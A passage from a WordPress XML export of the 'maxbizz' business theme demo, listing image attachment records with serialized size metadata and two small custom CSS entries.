"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-shop-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-shop-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-team/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2028</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/12/pheader-team.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-team-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-team-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-team-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-team-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-team-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-team-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-team-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-typo</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-typo/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2029</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-typo]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-typo.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/12/pheader-typo.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-typo-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-typo-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-typo-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-typo-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-typo-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-typo-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-typo-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-typo-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-typo-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-value/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2030</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:25:"2020/12/pheader-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:24:"pheader-value-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"pheader-value-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"pheader-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"pheader-value-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"pheader-value-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"pheader-value-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"pheader-value-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/maxbizz/</link>
		<pubDate>Fri, 02 Oct 2020 03:26:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/maxbizz/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1210</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 03:26:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 03:26:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/maxbizz-2/</link>
		<pubDate>Mon, 26 Oct 2020 03:09:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/26/maxbizz-2/</guid>
		<description></description>
		<content:encoded><![CDATA[.widget .recent-news h6{
	font-size: 17px;
}
.post-nav .info-post h6{
	font-size: 18px;
}
]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1533</wp:post_id>
		<wp:post_date><![CDATA[2020-10-26 03:09:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-26 03:09:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>pheader-service</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-service/</link>
		<pubDate>Tue, 29 Dec 2020 07:59:34 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2033</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:59:34]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:59:34]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-service]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-service.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:27:"2020/12/pheader-service.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"pheader-service-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"pheader-service-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"pheader-service-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"pheader-service-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:28:"pheader-service-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-service-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-service-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:28:"pheader-service-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:28:"pheader-service-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/image1-about-us/</link>
		<pubDate>Tue, 29 Dec 2020 08:04:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2037</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:04:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:04:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/image1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:630;s:6:"height";i:475;s:4:"file";s:27:"2020/12/image1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:27:"image1-about-us-300x226.jpg";s:5:"width";i:300;s:6:"height";i:226;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"image1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"image1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"image1-about-us-600x475.jpg";s:5:"width";i:600;s:6:"height";i:475;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/features1-about-us/</link>
		<pubDate>Tue, 29 Dec 2020 08:07:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2041</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:07:40]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:07:40]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/features1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/12/features1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features1-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features1-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/features2-about-us/</link>
		<pubDate>Tue, 29 Dec 2020 08:07:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2042</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:07:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:07:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/features2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/12/features2-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features2-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features2-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features2-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features2-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features3-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/features3-about-us/</link>
		<pubDate>Tue, 29 Dec 2020 08:07:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2043</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:07:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:07:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features3-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/features3-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
